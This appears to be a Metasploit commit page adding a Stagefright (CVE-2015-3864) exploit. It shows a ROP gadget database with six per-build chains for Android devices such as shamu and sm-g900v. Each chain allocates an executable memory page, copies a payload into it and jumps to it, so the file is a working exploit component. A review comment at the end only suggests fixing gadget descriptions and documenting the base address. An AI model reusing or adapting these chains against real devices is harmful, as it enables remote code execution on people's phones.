
Commit a13e83a

committed
Land rapid7#7357, Stagefright CVE-2015-3864
2 parents 00258a4 + dbf66f2 commit a13e83a

2 files changed

+1437
-0
lines changed


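--- a/data/ropdb/stagefright.xml
+++ b/data/ropdb/stagefright.xml
@@ -0,0 +1,225 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+<compatibility>
+<target>lrx</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x000042f9">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x001127b8">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x00058e63">pop {r4, pc}</gadget>
+<gadget offset="0x00110438">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x00061597">pop {r1, r2, r7, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0002fed3">bx r0</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>lmy-1</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x000bfdbf">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000f379">pop {r4, pc}</gadget>
+<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x000a1251">pop {r1, r2, r7, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x000301a5">bx r0</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>lmy-2</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000f379">pop {r4, pc}</gadget>
+<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000b3bd">bx r0</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>shamu / LYZ28E</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x000bfe4f">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x00044f71">pop {r4, pc}</gadget>
+<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000f7cd">bx r0</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>shamu / LYZ28J</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x00044f71">pop {r4, pc}</gadget>
+<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000f83d">bx r0</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>sm-g900v / OE1</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x00092b85">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x0017af08">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x00065467">pop {r4, pc}</gadget>
+<gadget offset="0x0017a6e4">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x0009f359">pop {r1, r2, r7, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000c409">bx r0</gadget>
+</gadgets>
+</rop>
+
+</db>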
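Review bot: The gadget descriptions are the only documentation of what each slot means, and two of them are wrong or ambiguous in every one of the six `<rop>` blocks: `addres hint` (lines 12, 49, 86, 123, 160, 197) should read `address hint`, and the consecutive pair at lines 19-20 (repeated at 56-57, 93-94, 130-131, 167-168, 204-205) both say `mmap64 fd` although only one of the two values can be the descriptor, so the second should state what it actually occupies, e.g. `<gadget value="0x00000000">padding before the 64-bit mmap64 offset</gadget>` if that is its role. The file also never says what the `offset` values are relative to, nor whether `base="0xb66a0000"` is consumed as-is or replaced by the module at run time; a short comment under `<db>` naming the shared object the offsets were taken from and how `base` is used would make the identical `base` attribute across six different builds auditable rather than a silent assumption. Since the sentinel strings `junk` and `size` share the `value` attribute with hex literals, that same comment should list the sentinel values the loader recognises. Declaring `encoding="ISO-8859-1"` is harmless for this all-ASCII content, but UTF-8 is the conventional choice for a new file.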
